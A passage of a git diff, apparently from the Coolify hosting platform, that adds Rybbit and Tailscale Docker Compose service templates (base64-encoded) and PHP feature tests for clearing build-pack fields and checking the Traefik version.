FzeW5jaHJvbm91c19tZXRyaWNfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8c2Vzc2lvbl9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxwYXJ0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGxhdGVuY3lfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cHJvY2Vzc29yc19wcm9maWxlX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG48L2NsaWNraG91c2U+IgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlX2NvbmZpZy9uZXR3b3JrLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9uZXR3b3JrLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8bGlzdGVuX2hvc3Q+MC4wLjAuMDwvbGlzdGVuX2hvc3Q+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL3VzZXJfbG9nZ2luZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvY29uZmlnLmQvdXNlcl9sb2dnaW5nLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8cHJvZmlsZXM+XG4gICAgICAgIDxkZWZhdWx0PlxuICAgICAgICAgICAgPGxvZ19xdWVyaWVzPjA8L2xvZ19xdWVyaWVzPlxuICAgICAgICAgICAgPGxvZ19xdWVyeV90aHJlYWRzPjA8L2xvZ19xdWVyeV90aHJlYWRzPlxuICAgICAgICAgICAgPGxvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPjA8L2xvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPlxuICAgICAgICA8L2RlZmF1bHQ+XG4gICAgPC9wcm9maWxlcz5cbjwvY2xpY2tob3VzZT4iCg==", + "compose": "c2VydmljZXM6CiAgcnliYml0OgogICAgaW1hZ2U6ICdnaGNyLmlvL3J5YmJpdC1pby9yeWJiaXQtY2xpZW50OnYxLjYuMScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9SWUJCSVRfMzAwMgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSAnTkVYVF9QVUJMSUNfQkFDS0VORF9VUkw9JHtTRVJWSUNFX0ZRRE5fUllCQklUfScKICAgICAgLSAnTkVYVF9QVUJMSUNfRElTQUJMRV9TSUdOVVA9JHtESVNBQkxFX1NJR05VUDotZmFsc2V9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSByeWJiaXRfYmFja2VuZAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICduYyAteiAxMjcuMC4wLjEgMzAwMicKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogIHJ5YmJpdF9iYWNrZW5kOgogICAgaW1hZ2U6ICdnaGNyLmlvL3J5YmJpdC1pby9yeWJiaXQtYmFja2VuZDp2MS42LjEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBOT0RFX0VOVj1wcm9kdWN0aW9uCiAgICAgIC0gVFJVU1RfUFJPWFk9dHJ1ZQogICAgICAtICdCQVNFX1VSTD0ke1NFUlZJQ0VfRlFETl9SWUJCSVR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnQkVUVEVSX0FVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfNjRfQkFDS0VORH0nCiAgICAgIC0gJ0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnRElTQUJMRV9URUxFTUVUUlk9JHtESVNBQkxFX1RFTEVNRVRSWTotdHJ1ZX0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfSE9TVD1odHRwOi8vcnliYml0X2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7Q0xJQ0tIT1VTRV9VU0VSOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9EQj0ke0NMSUNLSE9VU0VfREI6LWFuYWx5dGljc30nCiAgICAgIC0gUE9TVEdSRVNfSE9TVD1yeWJiaXRfcG9zdGdyZXMKICAgICAgLSBQT1NUR1JFU19QT1JUPTU0MzIKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgZGVwZW5kc19vbjoKICAgICAgcnliYml0X2NsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcnliYml0X3Bvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAxL2FwaS9oZWFsdGgnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICByeWJiaXRfcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE3LjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgcnliYml0X2NsaWNraG91c2U6CiAgICBpbWFnZTogJ2NsaWNraG91c2UvY2xpY2tob3VzZS1zZXJ2ZXI6MjUuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1hbmFseXRpY3N9JwogICAgICAtICdDTElDS0hPVVNFX1VTRVI9JHtDTElDS0hPVVNFX1VTRVI6LWRlZmF1bHR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZycKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgdm9sdW1lczoKICAgICAgLSAnY2xpY2tob3VzZV9kYXRhOi92YXIvbGliL2NsaWNraG91c2UnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2VuYWJsZV9qc29uLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9lbmFibGVfanNvbi54bWwKICAgICAgICBjb250ZW50OiAiPGNsaWNraG91c2U+XG4gICAgPHNldHRpbmdzPlxuICAgICAgICA8ZW5hYmxlX2pzb25fdHlwZT4xPC9lbmFibGVfanNvbl90eXBlPlxuICAgIDwvc2V0dGluZ3M+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2NsaWNraG91c2Utc2VydmVyL2NvbmZpZy5kL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgY29udGVudDogIjxjbGlja2hvdXNlPlxuICAgIDxsb2dnZXI+XG4gICAgICAgIDxsZXZlbD53YXJuaW5nPC9sZXZlbD5cbiAgICAgICAgPGNvbnNvbGU+dHJ1ZTwvY29uc29sZT5cbiAgICA8L2xvZ2dlcj5cbiAgICA8cXVlcnlfdGhyZWFkX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHF1ZXJ5X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRleHRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8dHJhY2VfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8bWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGFzeW5jaHJvbm91c19tZXRyaWNfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8c2Vzc2lvbl9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxwYXJ0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGxhdGVuY3lfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cHJvY2Vzc29yc19wcm9maWxlX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG48L2NsaWNraG91c2U+IgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlX2NvbmZpZy9uZXR3b3JrLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9uZXR3b3JrLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8bGlzdGVuX2hvc3Q+MC4wLjAuMDwvbGlzdGVuX2hvc3Q+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL3VzZXJfbG9nZ2luZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvY29uZmlnLmQvdXNlcl9sb2dnaW5nLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8cHJvZmlsZXM+XG4gICAgICAgIDxkZWZhdWx0PlxuICAgICAgICAgICAgPGxvZ19xdWVyaWVzPjA8L2xvZ19xdWVyaWVzPlxuICAgICAgICAgICAgPGxvZ19xdWVyeV90aHJlYWRzPjA8L2xvZ19xdWVyeV90aHJlYWRzPlxuICAgICAgICAgICAgPGxvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPjA8L2xvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPlxuICAgICAgICA8L2RlZmF1bHQ+XG4gICAgPC9wcm9maWxlcz5cbjwvY2xpY2tob3VzZT5cbiIK", "tags": [ "analytics", "web", @@ -3673,7 +3729,7 @@ "clickhouse", "postgres" ], - "category": null, + "category": "analytics", "logo": "svgs/rybbit.svg", "minversion": "0.0.0", "port": "3002" @@ -4034,6 +4090,19 @@ "minversion": "0.0.0", "port": "8384" }, + "tailscale-client": { + "documentation": "https://tailscale.com/kb?utm_source=coolify.io", + "slogan": "Tailscale securely connects your devices over the internet using WireGuard.", + "compose": "c2VydmljZXM6CiAgdGFpbHNjYWxlLWNsaWVudDoKICAgIGltYWdlOiAndGFpbHNjYWxlL3RhaWxzY2FsZTpsYXRlc3QnCiAgICBob3N0bmFtZTogJyR7VFNfSE9TVE5BTUU6LWNvb2xpZnktdHN9JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1RTX0hPU1ROQU1FPSR7VFNfSE9TVE5BTUU6LWNvb2xpZnktdHN9JwogICAgICAtICdUU19BVVRIS0VZPSR7VFNfQVVUSEtFWTo/fScKICAgICAgLSAnVFNfU1RBVEVfRElSPSR7VFNfU1RBVEVfRElSOi0vdmFyL2xpYi90YWlsc2NhbGV9JwogICAgICAtICdUU19VU0VSU1BBQ0U9JHtUU19VU0VSU1BBQ0U6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3RhaWxzY2FsZS1jbGllbnQ6L3Zhci9saWIvdGFpbHNjYWxlJwogICAgZGV2aWNlczoKICAgICAgLSAnL2Rldi9uZXQvdHVuOi9kZXYvbmV0L3R1bicKICAgIGNhcF9hZGQ6CiAgICAgIC0gbmV0X2FkbWluCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInRhaWxzY2FsZSBzdGF0dXMgLS1qc29uIHwgZ3JlcCAtcSAnQmFja2VuZFN0YXRlJyIKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgbmdpbng6CiAgICBpbWFnZTogJ25naW54OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gdGFpbHNjYWxlLWNsaWVudAogICAgbmV0d29ya19tb2RlOiAnc2VydmljZTp0YWlsc2NhbGUtY2xpZW50JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgwLycKICAgICAgICAtICctbycKICAgICAgICAtIC9kZXYvbnVsbAogICAgICBpbnRlcnZhbDogMjBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMK", + "tags": [ + "vpn", + "wireguard", + "remote-access" + ], + "category": "networking", + "logo": "svgs/tailscale.svg", + "minversion": "0.0.0" + }, "teable": { "documentation": "https://help.teable.io/?utm_source=coolify.io", "slogan": "Teable is a powerful visual interface built on relational databases (PostgreSQL).", diff --git a/tests/Feature/ApplicationBuildpackCleanupTest.php b/tests/Feature/ApplicationBuildpackCleanupTest.php new file mode 100644 index 000000000..b6b535a76 --- /dev/null +++ b/tests/Feature/ApplicationBuildpackCleanupTest.php @@ -0,0 +1,183 @@ +create(); + $project = Project::factory()->create(['team_id' => $team->id]); + $environment = Environment::factory()->create(['project_id' => $project->id]); + + $application = Application::factory()->create([ + 'environment_id' => $environment->id, + 'build_pack' => 'dockerfile', + 'dockerfile' => 'FROM node:18\nHEALTHCHECK CMD curl -f http://localhost/ || exit 1', + 'dockerfile_location' => '/Dockerfile', + 'dockerfile_target_build' => 'production', + 'custom_healthcheck_found' => true, + ]); + + // Change buildpack to nixpacks + $application->build_pack = 'nixpacks'; + $application->save(); + + // Reload from database + $application->refresh(); + + // Verify dockerfile fields were cleared + expect($application->build_pack)->toBe('nixpacks'); + expect($application->dockerfile)->toBeNull(); + expect($application->dockerfile_location)->toBeNull(); + expect($application->dockerfile_target_build)->toBeNull(); + expect($application->custom_healthcheck_found)->toBeFalse(); + }); + + test('model clears dockerfile fields when build_pack changes from dockerfile to static', function () { + $team = Team::factory()->create(); + $project = Project::factory()->create(['team_id' => $team->id]); + $environment = Environment::factory()->create(['project_id' => $project->id]); + + $application = Application::factory()->create([ + 'environment_id' => $environment->id, + 'build_pack' => 'dockerfile', + 'dockerfile' => 'FROM nginx:alpine', + 'dockerfile_location' => '/custom.Dockerfile', + 'dockerfile_target_build' => 'prod', + 'custom_healthcheck_found' => true, + ]); + + $application->build_pack = 'static'; + $application->save(); + $application->refresh(); + + expect($application->build_pack)->toBe('static'); + expect($application->dockerfile)->toBeNull(); + expect($application->dockerfile_location)->toBeNull(); + expect($application->dockerfile_target_build)->toBeNull(); + expect($application->custom_healthcheck_found)->toBeFalse(); + }); + + test('model clears dockercompose fields when build_pack changes from dockercompose to nixpacks', function () { + $team = Team::factory()->create(); + $project = Project::factory()->create(['team_id' => $team->id]); + $environment = Environment::factory()->create(['project_id' => $project->id]); + + $application = Application::factory()->create([ + 'environment_id' => $environment->id, + 'build_pack' => 'dockercompose', + 'docker_compose_domains' => '{"app": "example.com"}', + 'docker_compose_raw' => 'version: "3.8"\nservices:\n app:\n image: nginx', + ]); + + // Add environment variables that should be deleted + EnvironmentVariable::create([ + 'application_id' => $application->id, + 'key' => 'SERVICE_FQDN_APP', + 'value' => 'app.example.com', + 'is_build_time' => false, + 'is_preview' => false, + ]); + + EnvironmentVariable::create([ + 'application_id' => $application->id, + 'key' => 'SERVICE_URL_APP', + 'value' => 'http://app.example.com', + 'is_build_time' => false, + 'is_preview' => false, + ]); + + EnvironmentVariable::create([ + 'application_id' => $application->id, + 'key' => 'REGULAR_VAR', + 'value' => 'should_remain', + 'is_build_time' => false, + 'is_preview' => false, + ]); + + $application->build_pack = 'nixpacks'; + $application->save(); + $application->refresh(); + + expect($application->build_pack)->toBe('nixpacks'); + expect($application->docker_compose_domains)->toBeNull(); + expect($application->docker_compose_raw)->toBeNull(); + + // Verify SERVICE_FQDN_* and SERVICE_URL_* were deleted + expect($application->environment_variables()->where('key', 'SERVICE_FQDN_APP')->count())->toBe(0); + expect($application->environment_variables()->where('key', 'SERVICE_URL_APP')->count())->toBe(0); + + // Verify regular variables remain + expect($application->environment_variables()->where('key', 'REGULAR_VAR')->count())->toBe(1); + }); + + test('model does not clear dockerfile fields when switching to dockerfile', function () { + $team = Team::factory()->create(); + $project = Project::factory()->create(['team_id' => $team->id]); + $environment = Environment::factory()->create(['project_id' => $project->id]); + + $application = Application::factory()->create([ + 'environment_id' => $environment->id, + 'build_pack' => 'nixpacks', + 'dockerfile' => null, + ]); + + $application->build_pack = 'dockerfile'; + $application->save(); + $application->refresh(); + + // When switching TO dockerfile, no cleanup should happen + expect($application->build_pack)->toBe('dockerfile'); + }); + + test('model does not clear fields when switching between non-dockerfile buildpacks', function () { + $team = Team::factory()->create(); + $project = Project::factory()->create(['team_id' => $team->id]); + $environment = Environment::factory()->create(['project_id' => $project->id]); + + $application = Application::factory()->create([ + 'environment_id' => $environment->id, + 'build_pack' => 'nixpacks', + 'dockerfile' => null, + 'dockerfile_location' => null, + ]); + + $application->build_pack = 'static'; + $application->save(); + $application->refresh(); + + expect($application->build_pack)->toBe('static'); + expect($application->dockerfile)->toBeNull(); + }); + + test('model does not trigger cleanup when build_pack is not changed', function () { + $team = Team::factory()->create(); + $project = Project::factory()->create(['team_id' => $team->id]); + $environment = Environment::factory()->create(['project_id' => $project->id]); + + $application = Application::factory()->create([ + 'environment_id' => $environment->id, + 'build_pack' => 'dockerfile', + 'dockerfile' => 'FROM alpine:latest', + 'dockerfile_location' => '/Dockerfile', + 'custom_healthcheck_found' => true, + ]); + + // Update another field without changing build_pack + $application->name = 'Updated Name'; + $application->save(); + $application->refresh(); + + // Dockerfile fields should remain unchanged + expect($application->build_pack)->toBe('dockerfile'); + expect($application->dockerfile)->toBe('FROM alpine:latest'); + expect($application->dockerfile_location)->toBe('/Dockerfile'); + expect($application->custom_healthcheck_found)->toBeTrue(); + }); +}); diff --git a/tests/Feature/BuildpackSwitchCleanupTest.php b/tests/Feature/BuildpackSwitchCleanupTest.php new file mode 100644 index 000000000..b040f9a8f --- /dev/null +++ b/tests/Feature/BuildpackSwitchCleanupTest.php @@ -0,0 +1,134 @@ +team = Team::factory()->create(); + $this->user = User::factory()->create(); + $this->team->members()->attach($this->user->id, ['role' => 'owner']); + + // Set current team + $this->actingAs($this->user); + session(['currentTeam' => $this->team]); + + // Create project and environment + $this->project = Project::factory()->create(['team_id' => $this->team->id]); + $this->environment = Environment::factory()->create(['project_id' => $this->project->id]); +}); + +describe('Buildpack Switching Cleanup', function () { + test('clears dockerfile fields when switching from dockerfile to nixpacks', function () { + // Create an application with dockerfile buildpack and dockerfile content + $application = Application::factory()->create([ + 'environment_id' => $this->environment->id, + 'build_pack' => 'dockerfile', + 'dockerfile' => 'FROM node:18\nHEALTHCHECK CMD curl -f http://localhost/ || exit 1', + 'dockerfile_location' => '/Dockerfile', + 'dockerfile_target_build' => 'production', + 'custom_healthcheck_found' => true, + ]); + + // Switch to nixpacks buildpack + Livewire::test(General::class, ['application' => $application]) + ->assertSuccessful() + ->set('buildPack', 'nixpacks') + ->call('updatedBuildPack'); + + // Verify dockerfile fields were cleared + $application->refresh(); + expect($application->build_pack)->toBe('nixpacks'); + expect($application->dockerfile)->toBeNull(); + expect($application->dockerfile_location)->toBeNull(); + expect($application->dockerfile_target_build)->toBeNull(); + expect($application->custom_healthcheck_found)->toBeFalse(); + }); + + test('clears dockerfile fields when switching from dockerfile to static', function () { + $application = Application::factory()->create([ + 'environment_id' => $this->environment->id, + 'build_pack' => 'dockerfile', + 'dockerfile' => 'FROM nginx:alpine', + 'dockerfile_location' => '/custom.Dockerfile', + 'dockerfile_target_build' => 'prod', + 'custom_healthcheck_found' => true, + ]); + + Livewire::test(General::class, ['application' => $application]) + ->assertSuccessful() + ->set('buildPack', 'static') + ->call('updatedBuildPack'); + + $application->refresh(); + expect($application->build_pack)->toBe('static'); + expect($application->dockerfile)->toBeNull(); + expect($application->dockerfile_location)->toBeNull(); + expect($application->dockerfile_target_build)->toBeNull(); + expect($application->custom_healthcheck_found)->toBeFalse(); + }); + + test('does not clear dockerfile fields when switching to dockerfile', function () { + $application = Application::factory()->create([ + 'environment_id' => $this->environment->id, + 'build_pack' => 'nixpacks', + 'dockerfile' => null, + ]); + + Livewire::test(General::class, ['application' => $application]) + ->assertSuccessful() + ->set('buildPack', 'dockerfile') + ->call('updatedBuildPack'); + + // When switching TO dockerfile, fields remain as they were + $application->refresh(); + expect($application->build_pack)->toBe('dockerfile'); + }); + + test('does not affect fields when switching between non-dockerfile buildpacks', function () { + $application = Application::factory()->create([ + 'environment_id' => $this->environment->id, + 'build_pack' => 'nixpacks', + 'dockerfile' => null, + 'dockerfile_location' => null, + ]); + + Livewire::test(General::class, ['application' => $application]) + ->assertSuccessful() + ->set('buildPack', 'static') + ->call('updatedBuildPack'); + + $application->refresh(); + expect($application->build_pack)->toBe('static'); + expect($application->dockerfile)->toBeNull(); + }); + + test('clears dockerfile fields when switching from dockerfile to dockercompose', function () { + $application = Application::factory()->create([ + 'environment_id' => $this->environment->id, + 'build_pack' => 'dockerfile', + 'dockerfile' => 'FROM alpine:latest', + 'dockerfile_location' => '/docker/Dockerfile', + 'custom_healthcheck_found' => true, + ]); + + Livewire::test(General::class, ['application' => $application]) + ->assertSuccessful() + ->set('buildPack', 'dockercompose') + ->call('updatedBuildPack'); + + $application->refresh(); + expect($application->build_pack)->toBe('dockercompose'); + expect($application->dockerfile)->toBeNull(); + expect($application->dockerfile_location)->toBeNull(); + expect($application->custom_healthcheck_found)->toBeFalse(); + }); +}); diff --git a/tests/Feature/CheckTraefikVersionJobTest.php b/tests/Feature/CheckTraefikVersionJobTest.php new file mode 100644 index 000000000..b7c5dd50d --- /dev/null +++ b/tests/Feature/CheckTraefikVersionJobTest.php @@ -0,0 +1,216 @@ +toBeTrue(); +}); + +it('server model casts detected_traefik_version as string', function () { + $server = Server::factory()->make(); + + expect($server->getFillable())->toContain('detected_traefik_version'); +}); + +it('notification settings have traefik_outdated fields', function () { + $team = Team::factory()->create(); + + // Check Email notification settings + expect($team->emailNotificationSettings)->toHaveKey('traefik_outdated_email_notifications'); + + // Check Discord notification settings + expect($team->discordNotificationSettings)->toHaveKey('traefik_outdated_discord_notifications'); + + // Check Telegram notification settings + expect($team->telegramNotificationSettings)->toHaveKey('traefik_outdated_telegram_notifications'); + expect($team->telegramNotificationSettings)->toHaveKey('telegram_notifications_traefik_outdated_thread_id'); + + // Check Slack notification settings + expect($team->slackNotificationSettings)->toHaveKey('traefik_outdated_slack_notifications'); + + // Check Pushover notification settings + expect($team->pushoverNotificationSettings)->toHaveKey('traefik_outdated_pushover_notifications'); + + // Check Webhook notification settings + expect($team->webhookNotificationSettings)->toHaveKey('traefik_outdated_webhook_notifications'); +}); + +it('versions.json contains traefik branches with patch versions', function () { + $versionsPath = base_path('versions.json'); + expect(File::exists($versionsPath))->toBeTrue(); + + $versions = json_decode(File::get($versionsPath), true); + expect($versions)->toHaveKey('traefik'); + + $traefikVersions = $versions['traefik']; + expect($traefikVersions)->toBeArray(); + + // Each branch should have format like "v3.6" => "3.6.0" + foreach ($traefikVersions as $branch => $version) { + expect($branch)->toMatch('/^v\d+\.\d+$/'); // e.g., "v3.6" + expect($version)->toMatch('/^\d+\.\d+\.\d+$/'); // e.g., "3.6.0" + } +}); + +it('formats version with v prefix for display', function () { + // Test the formatVersion logic from notification class + $version = '3.6'; + $formatted = str_starts_with($version, 'v') ? $version : "v{$version}"; + + expect($formatted)->toBe('v3.6'); + + $versionWithPrefix = 'v3.6'; + $formatted2 = str_starts_with($versionWithPrefix, 'v') ? $versionWithPrefix : "v{$versionWithPrefix}"; + + expect($formatted2)->toBe('v3.6'); +}); + +it('compares semantic versions correctly', function () { + // Test version comparison logic used in job + $currentVersion = 'v3.5'; + $latestVersion = 'v3.6'; + + $isOutdated = version_compare(ltrim($currentVersion, 'v'), ltrim($latestVersion, 'v'), '<'); + + expect($isOutdated)->toBeTrue(); + + // Test equal versions + $sameVersion = version_compare(ltrim('3.6', 'v'), ltrim('3.6', 'v'), '='); + expect($sameVersion)->toBeTrue(); + + // Test newer version + $newerVersion = version_compare(ltrim('3.7', 'v'), ltrim('3.6', 'v'), '>'); + expect($newerVersion)->toBeTrue(); +}); + +it('notification class accepts servers collection with outdated info', function () { + $team = Team::factory()->create(); + $server1 = Server::factory()->make([ + 'name' => 'Server 1', + 'team_id' => $team->id, + 'detected_traefik_version' => 'v3.5.0', + ]); + $server1->outdatedInfo = [ + 'current' => '3.5.0', + 'latest' => '3.5.6', + 'type' => 'patch_update', + ]; + + $server2 = Server::factory()->make([ + 'name' => 'Server 2', + 'team_id' => $team->id, + 'detected_traefik_version' => 'v3.4.0', + ]); + $server2->outdatedInfo = [ + 'current' => '3.4.0', + 'latest' => '3.6.0', + 'type' => 'minor_upgrade', + ]; + + $servers = collect([$server1, $server2]); + + $notification = new TraefikVersionOutdated($servers); + + expect($notification->servers)->toHaveCount(2); + expect($notification->servers->first()->outdatedInfo['type'])->toBe('patch_update'); + expect($notification->servers->last()->outdatedInfo['type'])->toBe('minor_upgrade'); +}); + +it('notification channels can be retrieved', function () { + $team = Team::factory()->create(); + + $notification = new TraefikVersionOutdated(collect()); + $channels = $notification->via($team); + + expect($channels)->toBeArray(); +}); + +it('traefik version check command exists', function () { + $commands = \Illuminate\Support\Facades\Artisan::all(); + + expect($commands)->toHaveKey('traefik:check-version'); +}); + +it('job handles servers with no proxy type', function () { + $team = Team::factory()->create(); + $server = Server::factory()->create([ + 'team_id' => $team->id, + ]); + + // Server without proxy configuration returns null for proxyType() + expect($server->proxyType())->toBeNull(); +}); + +it('handles latest tag correctly', function () { + // Test that 'latest' tag is not considered for outdated comparison + $currentVersion = 'latest'; + $latestVersion = '3.6'; + + // Job skips notification for 'latest' tag + $shouldNotify = $currentVersion !== 'latest'; + + expect($shouldNotify)->toBeFalse(); +}); + +it('groups servers by team correctly', function () { + $team1 = Team::factory()->create(['name' => 'Team 1']); + $team2 = Team::factory()->create(['name' => 'Team 2']); + + $servers = collect([ + (object) ['team_id' => $team1->id, 'name' => 'Server 1'], + (object) ['team_id' => $team1->id, 'name' => 'Server 2'], + (object) ['team_id' => $team2->id, 'name' => 'Server 3'], + ]); + + $grouped = $servers->groupBy('team_id'); + + expect($grouped)->toHaveCount(2); + expect($grouped[$team1->id])->toHaveCount(2); + expect($grouped[$team2->id])->toHaveCount(1); +}); + +it('server check job exists and has correct structure', function () { + expect(class_exists(\App\Jobs\CheckTraefikVersionForServerJob::class))->toBeTrue(); + + // Verify CheckTraefikVersionForServerJob has required properties + $reflection = new \ReflectionClass(\App\Jobs\CheckTraefikVersionForServerJob::class); + expect($reflection->hasProperty('tries'))->toBeTrue(); + expect($reflection->hasProperty('timeout'))->toBeTrue(); + + // Verify it implements ShouldQueue + $interfaces = class_implements(\App\Jobs\CheckTraefikVersionForServerJob::class); + expect($interfaces)->toContain(\Illuminate\Contracts\Queue\ShouldQueue::class); +}); + +it('sends immediate notifications when outdated traefik is 